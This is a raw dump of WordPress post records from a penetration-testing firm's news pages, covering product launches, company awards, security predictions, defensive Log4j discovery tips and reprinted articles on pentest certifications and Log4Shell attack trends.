Comprehensive Asset Discovery: NetSPI’s Attack Surface Management technology platform leverages automated scanning and orchestration technology to map, identify, and inventory all assets and improve attack surface visibility.
24/7/365 Continuous Testing: The cloud-native, dynamic application monitors the attack surface continuously and alerts when a high-risk exposure is detected. It provides simplified and always-on attack surface visualization to view your entire external attack surface in a single platform.
Manual Exposure Triaging: The NetSPI Attack Surface Management (ASM) Operations Team triages high-risk exposures to validate the exposure, evaluate the risk it poses to your business, support your team with remediation advisory, and escalate worrisome exposures to our penetration testing team to investigate further.
“The current attack surface management market is reliant on technology. But to find critical exposures that put your organization at risk, human intuition is required,” said Aaron Shilts, CEO at NetSPI. “Our ASM Operations Team is rooted in 20 years of manual penetration testing expertise. We bring a human-centric, strategic approach to the market that will help security leaders get a better handle on their evolving attack surface.”
The Attack Surface Management (ASM) platform also features simple set-up, tracking and trending data over time, asset intelligence, Slack and email integrations, open source intelligence gathering, asset and exposure prioritization, port discovery, and more. For additional details on its capabilities and features, download the attack surface management data sheet.
To learn more or get started with Attack Surface Management, email sales@netspi.com or visit our website.
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform driven, human delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
[post_title] => NetSPI Launches New Attack Surface Management Platform
[post_excerpt] => Learn more about NetSPI's Attack Surface Management solution which leverages innovative technology, continuous penetration testing, and expert pentesters to help organizations discover and secure all assets on the external attack surface and increase attack surface visibility.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => attack-surface-management
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:51
[post_modified_gmt] => 2023-01-23 21:10:51
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27377
[menu_order] => 176
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[43] => WP_Post Object
(
[ID] => 27266
[post_author] => 91
[post_date] => 2022-02-01 11:15:00
[post_date_gmt] => 2022-02-01 17:15:00
[post_content] =>
Amidst a year of rapid growth, NetSPI is recognized for its strong corporate culture.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage – a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection.
"This recognition by Energage is a true testament to what makes NetSPI a leading, innovative company," said Aaron Shilts, CEO of NetSPI. "Our employees are the heart of our business, working to drive results for our clients, while celebrating our wins together as a team. I’m proud to see NetSPI recognized for our strong culture, as it is the key to what makes our company special."
This Top Workplace recognition follows a year of success and growth for the company. The team brought on more than 100 new employees in 2021, all of who played a part in achieving 51% organic revenue growth and 100% bookings growth throughout the fiscal year.
"While we’ve grown rapidly over the past year, increasing the size of our team by 50%, we have not lost sight of the elements that make NetSPI a great place to work," said Heather Neumeister, Director of People Operations at NetSPI. "Our employees prioritize collaboration and foster both individual and team growth, creating a culture where everyone is excited to come to work each day."
Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,100 organizations have been honored with the Top Workplaces USA award this year.
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About Energage
Making the world a better place to work together.™ Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70, 000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.
[post_title] => Energage Names NetSPI a 2022 Top Workplaces USA Winner
[post_excerpt] => Read how NetSPI won the 2022 Top Workplaces USA with its strong corporate culture and significant growth.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 2022-top-workplaces-usa
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:55
[post_modified_gmt] => 2023-01-23 21:10:55
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27266
[menu_order] => 184
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[44] => WP_Post Object
(
[ID] => 27234
[post_author] => 91
[post_date] => 2022-01-25 08:05:00
[post_date_gmt] => 2022-01-25 14:05:00
[post_content] =>
NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees.
To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.
“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.”
Achievements that contributed to NetSPI’s success in 2021 include:
$90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets.
Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business.
New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks.
Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI’s new IoT testing services focuses on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.
About NetSPI
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives.
Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives.
Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.
“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.”
“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”
NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About Forbes Councils
Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive.
[post_title] => NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council
[post_excerpt] => Follow Travis on the Forbes Technology Council for insights on cybersecurity leadership and strategy, penetration testing, blockchain security, and more.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-cto-travis-hoyt-forbes-technology-council
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:56
[post_modified_gmt] => 2023-01-23 21:10:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27184
[menu_order] => 189
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[46] => WP_Post Object
(
[ID] => 27044
[post_author] => 91
[post_date] => 2022-01-04 07:00:00
[post_date_gmt] => 2022-01-04 13:00:00
[post_content] =>
And just like that, 2021 has come to a close. We started with SolarWinds and ended with Log4j… cyber adversaries certainly know how to keep us on our toes. In between, Microsoft Exchange, the Florida water plant, JBS, CNA Financial, Kaseya, EA, Colonial Pipeline, among other breach targets made headlines and shook up the security industry.
Each of these pivotal moments may have brought fear, uncertainty, and doubt, but with that also came innovation, a sense of community, and lessons learned. If there’s one thing to take away from the past year, it’s to always reflect on and learn from your experiences – good or bad.
In the name of reflection and moving forward, three NetSPI thought leaders, Travis Hoyt (CTO), Nabil Hannan (Managing Director), and Florindo Gallicchio (Head of Strategic Solutions) came together on a live panel to discuss their cybersecurity predictions for 2022.
Pulling from their decades of experience and daily conversations with some of the most prominent organizations across the globe. They tackled highly debated topics of 2021, from budgets to application security to ransomware. Continue reading to find out what they’re anticipating in the new year.
2022 cybersecurity budgets are going to rebound significantly
“Throughout my career, budgeting has always been a challenge. In 2020 and 2021, security budgets had suffered a pretty big hit primarily due to companies allocating that money to work from home technologies, digital transformation, and business continuity amid the pandemic. And we’re beginning to see those budgets rebound.
While we were cooped up in our houses and locked down at the beginning of the pandemic, the bad guys were not, and they kept busy uncovering egregious vulnerabilities to exploit. We noticed now that there's a game of catch up is being played and budgets are being allocated, or re-allocated, back to cybersecurity, penetration testing in particular.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI
CFOs will have more skin in the security game
“For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritizing conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that overalls all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don’t lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds. At mature organizations, CFOs are starting to understand that they've got a lot more skin in the game.” – Travis Hoyt, Chief Technology Officer, NetSPI
Cybersecurity insurers will ask deeper, more technical questions
“There’s currently a lack of willingness to underwrite cybersecurity policies. The market is cracking down and underwriters are asking tougher questions. Cybersecurity is not just a line item in a budget, it's not just a percentage of spend against it, it has much more material impact to the business. As you look at the mitigations and activities that you'll need to do with respect to understanding what you have in your environment, your exposures, your vulnerabilities – attack surface management, penetration testing – you’ll also need to look at your control posture. How are your teams responding to incursions? What kind of breach and attack simulation activities are you pursuing? These are the items that underwriters are going to curious about. It's a much deeper, much more technical set of questions than I have seen them ask historically, and I think it represents the evolution of the market.” – Travis Hoyt, Chief Technology Officer, NetSPI
More organizations will focus on risk in cybersecurity budgeting discussions
“We’ve noticed a heightened focus on a risk approach or risk justification for budgets, over compliance, check-the-box approaches we've seen in the past. Companies are starting to build budget justifications based on risk to the business. In fact, we are seeing more clients take a risk-based approach to cybersecurity spend than before.” – Florindo Gallicchio, Head of Strategic Solutions, NetSPI
2022 is the year of API security
“Watching application security, in conjunction with software development, evolve over the last 15 years, we've seen a significantly large uptick in API based architectures. I'm predicting 2022 is going to be the year of the API, where organizations will become serious about securing their APIs.
The Log4j issue arises from a bad habit that software development has fallen into: reusing components without fully understanding the implications. We're also building software with very small bite-sized components that interact with your web applications, your mobile applications, your thermostat at home, your smart car, and other things we rely heavily on. API security is going to get a lot more attention now because organizations are starting to realize how heavily dependent they are on this type of architecture. And you have to be dependent on this type of architecture if you truly want to build systems that are robust and scalable. I expect that API security will become one of the top priorities in the application security space this year.” – Nabil Hannan, Managing Director, NetSPI
The concept of ‘shift left’ will transform into ‘shift everywhere’
“Shift left is a great thought process, and we need to continue doing that. But we also have to start focusing on shifting right. We need to shift everywhere. Thinking of application security holistically will enable you to protect your organization and protect your systems.
Look at technologies beyond web firewalls. Start looking at the viability of RASP solutions. In certain scenarios, start thinking of how to integrate IAST into the QA testing process. All of these activities need to work together. The Log4j issue has highlighted the need to shift right. We need to learn from it and determine the right approach to protect our organizations for the next big vulnerability that comes up.” – Nabil Hannan, Managing Director, NetSPI
SaaS security posture management (SSPM) will be prioritized in 2022
“As organizations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organizations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organizations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organizations have a detailed understanding of their SaaS deployments and configurations or face higher premiums or even a refusal of insurance altogether.” - Travis Hoyt, Chief Technology Officer, NetSPI
The blockchain security space will grow in awareness and acumen
Blockchain is an interesting space on the currency and finance side. But what we're actually seeing is that there are a lot of people that are interested in the underlying technology, the distributed ledger technology. There are a lot of organizations, or consortiums, that are starting to leverage this technology to solve a variety of problems that allow them to interact in ways that perhaps they would not have been able to do - or do efficiently - in the past.
It's one of those things that security teams are going to have to start paying attention to. While there are overlaps with respect to the security testing methodologies, there are some unique differences that will change your operating and security processes, especially when you're deploying them in a distributed fashion. My prediction is that we will see the blockchain security space start to grow in 2022.
It's going to be a very compelling and interesting story. The acumen for attacking this technology by threat actors is already well cultivated. What we don't have is the same measure of acumen cultivation by the defenders. My call to action is, if this technology is going to be in play in your space, then you need to make sure that your teams understand how it operates, where it's unique, how it's unique, and what you need to defend it effectively and get that acumen development in place.” – Travis Hoyt, Chief Technology Officer, NetSPI
Company culture could solve the cybersecurity hiring crisis
“It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organization.”– Charles Horton, Chief Operations Officer, NetSPI [note: Charles was unable to attend the webinar, Nabil shared this prediction on his behalf]
The Skills Shortage Will Continue Until Hiring Practices Change
“In 2022 the cybersecurity skills gap will persist, but organizations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, these programs will only have limited success. The real culprit behind the skills gap is that organizations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.” – Nabil Hannan, Managing Director, NetSPI
[post_title] => New Year, New Trends: 2022 Cybersecurity Predictions
[post_excerpt] => Our experts reveal their security industry predictions for 2022, from cybersecurity budgets to application security to ransomware.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 2022-cybersecurity-trends-predictions
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:59
[post_modified_gmt] => 2023-01-23 21:10:59
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=27044
[menu_order] => 195
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[47] => WP_Post Object
(
[ID] => 26983
[post_author] => 91
[post_date] => 2021-12-21 07:00:00
[post_date_gmt] => 2021-12-21 13:00:00
[post_content] =>
The first step to remediating Log4j vulnerabilities? Discovery.
Identifying Apache Log4j usage at scale in any environment can be a challenge. Generally, we're seeing companies struggle to develop comprehensive strategies to identify the vulnerability accurately across their entire environment. Getting real coverage involves reviewing all assets from both an authenticated and unauthenticated perspective, and often requires additional collaboration with business units and development teams. In some cases, this can be a challenge when there are "black boxes" on their networks that have no clear owner.
To help you get started, we’ve pulled together five discovery tips to identify vulnerable instances of Log4j. For additional detail and best practices for discovery, download our tip sheet: 5 Strategies for Log4j Vulnerability Identification.
Perform both internal and external network scanning using common vulnerabilities scanners, such as Nmap or Nessus. Most of the Apache Log4j plugins used by vulnerability scanners only test a small subset of common HTTP headers, but they still provide basic coverage. To provide more comprehensive coverage, also perform focused web application testing. Create an inventory of externally and internally available web applications.
Leverage existing security or configuration management tooling to search systems for files that are unique to Log4j. Then, follow up on positive matches to determine if they are running a vulnerable version of Apache Log4j. The files can be downloaded online: https://logging.apache.org/log4j/2.x/index.html.
Reach out to vendors to determine if vulnerable Apache Log4j versions are being used for applications that were not developed by your company that have already been deployed to the environment.
Collaborate with internal business units and development groups to determine if vulnerable Apache Log4j versions are being used by internally developed applications.
Prioritize additional testing based on company defined risk. Testing should focus on mapping the web applications attack surface and testing all identifiable dynamic elements such common HTTP headers, parameters (GET, POST, JSON), and cookies.
Log4j is another example of attackers targeting software that's integrated into core IT supply chains. However, Log4j represents a much greater risk than some of its predecessors, because it’s widely associated with multiple operating systems and websites exposed to the internet. As a result, attackers are scrambling to use it as quickly as possible to gain a foothold in environments and leverage it to deploy sophisticated attacks, such as ransomware. I think this will be the first of many breakouts that target, not common software packages, but their dependencies/third party components.
Time is critical in this situation, and vulnerability discovery is the first step to protecting your organization from exploitation. Connect with NetSPI to learn how we can help you with our Log4j Vulnerability Assessment: https://www.netspi.com/contact-us/.
On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO. Read the full article below or online here.
+++
Penetration testing, sometimes called ethical hacking or red team hacking, is an exciting career path in which you simulate cyberattacks on target systems in order to test (and, ultimately, improve) their security. It's a job that lots of people currently working in infosec would like to have, and one that can be tricky to get as competition heats up.
"It used to be the best way to grow a career in attack and penetration was through hands-on experience," says Matthew Eidelberg, technical manager for threat management at Optiv. "It’s becoming harder and harder to break into pen testing as a beginner, because these roles are no longer considered niche. They are in high demand. As a result, a lot of effort has gone into certifications based on training and real-world lab simulations for both students and professionals."
In fact, a range of penetration testing certifications are now available from various companies and industry organizations—and earning these certs can boost your career prospects, says Ron Delfine, director of career services at Carnegie Mellon University's Heinz College. "Depending on what skills an organization is seeking," he says, "certification holders may have a competitive advantage related to career advancement, as they have already been through a proven process requiring them to display evidence of strong penetration testing skills through the certification and recertification process."
Top penetration testing certifications
How can you pick the best penetration testing certification for you? We spoke to a number of pen testing pros to see how different certifications have helped their careers or helped them find good candidates when they were hiring. In general, most of the people we spoke to grouped certs offered by the same orgs together, so that's how we'll treat them here too.
GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
EC-Council Certified Ethical Hacker (CEH)
EC-Council Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master)
CompTIA PenTest+
. . .
EC-Council
The EC-Council is a cybersecurity education and training nonprofit founded in the wake of the 9/11 attacks, and Certified Ethical Hacker (CEH) is perhaps their highest-profile cert—in fact, it's one of the best-known certifications in the field. The EC-Council recently launched a twinned pair of certs, Certified Penetration Testing Professional (CPENT) and Licensed Penetration Tester (LPT Master), that are based on the same training material and exam, with the LPT Master going to those who score best on the test.
CEH is relatively well known, and the security pros we spoke to note that it has its place in the field, but they were less enthusiastic about it than they were about certs from GIAC or Offensive Security. "I would note CEH as a ‘foot-in-the-door’ certification for a pen testing internship or in preparation for additional study," says Melissa Miller, managing security consultant at NetSPI. Critical Start's Rhoads-Herrera calls it "valuable as a good way to get past HR screeners" but adds that "the course work is not up to par with other certifications."
"CEH does qualify you for a number of contracts by virtue of being one of the oldest in the game," says Pluralsight's Rosenmund, "but doesn’t necessarily ensure from an employer perspective that you are ready to do the job." Counter Hack Challenges' Elgee gives a specific example: "CEH is most valuable for checking specific certification boxes, especially in US government," but says it "otherwise has a low value to price ratio."
Certified Ethical Hacker (CEH):
Prerequisites: You must either take an EC-Council-approved CEH training course or establish that you have at least two years of professional infosec experience before you can take the exam.
Test format:Four hours, 125 multiple choice questions. If you pass this exam, you can also take the Certified Ethical Hacker Practical exam—six hours, 20 practical challenges—in order to earn CEH Master certification.
Cost:The exam costs $1,199 plus $100 for remote proctoring; there is a $100 nonrefundable application fee, and official training courses can cost anywhere from $850 to $2,999.
Certified Penetration Testing Professional (CPENT)/Licensed Penetration Tester (LPT Master):
Prerequisites:Candidates must have already received CEH and Certified Security Analyst certs from the EC-Council, and submit an application that includes a criminal background check. The exam is meant to follow on from the EC-Council's CPENT training course, although experienced pen testers can request to "challenge" the exam based on their existing skills.
Test format:A 24-hour online practical exam in which you deploy advanced pen-testing techniques. A 90% score or above earns you the LPT certification, while 70-90% scores you a CPENT.
Cost:The CPENT course is $2,199, which includes the exam and access to the EC-Council's practice range and other content. There is also a $500 application fee (which covers the background check.)
[post_title] => CSO: 8 top penetration testing certifications employers value
[post_excerpt] => On December 20, 2021, NetSPI Managing Security Consultant Melissa Miller was featured in an article written by Josh Fruhlinger for CSO.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cso-8-top-penetration-testing-certifications-employers-value
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:11:01
[post_modified_gmt] => 2023-01-23 21:11:01
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=26981
[menu_order] => 199
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[49] => WP_Post Object
(
[ID] => 26964
[post_author] => 91
[post_date] => 2021-12-13 13:14:00
[post_date_gmt] => 2021-12-13 19:14:00
[post_content] =>
On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost. Read the full article below or online here.
+++
What some call the worst cybersecurity catastrophe of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.
The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.
Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.
“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.
The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.
Mutations May Enable Exploits to Slip Past Protections
On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing),” they said.
The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.
Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.
Tactical Shifts
Besides variations that can slip past protections, researchers are also seeing new tactics.
Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.
But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.
“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.
…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.
Bug Has Been Targeted All Month
Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.
On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.
“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”
On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.
Exploits Attempted on 40% of Corporate Networks
Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.
As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.
The map below illustrates the top targeted geographies.
Top affected geographies. Source: Check Point.
Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”
As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”
This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we’ve seen, along with some of the new protections and detection tools.
More News
Linux botnets have already exploited the flaw.NetLab 360 reported on Saturday that two of its honeypots have been attacked by the Muhstik and Mirai botnets. Following detection of those attacks, the Netlab 360 team found other botnets on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. BleepingComputer also reports that it’s observed the threat actors behind the Kinsing backdoor and cryptomining botnet “heavily abusing the Log4j vulnerability.”
Quebec shut down thousands of sites after disclosure of the Log4Shell flaw. “”We need to scan all of our systems,” said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. “We’re kind of looking for a needle in a haystack.”
New Protections, Detection Tools
On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.
Growing List of Affected Manufacturers, Components
As of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.
Immersive Labs has posted a hands-on lab of the incident.
Lacework has published a blog post regarding how the news affects security best practices at the developer level.
NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.
[post_title] => Threatpost: Log4Shell Is Spawning Even Nastier Mutations
[post_excerpt] => On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost.
[post_status] => publish
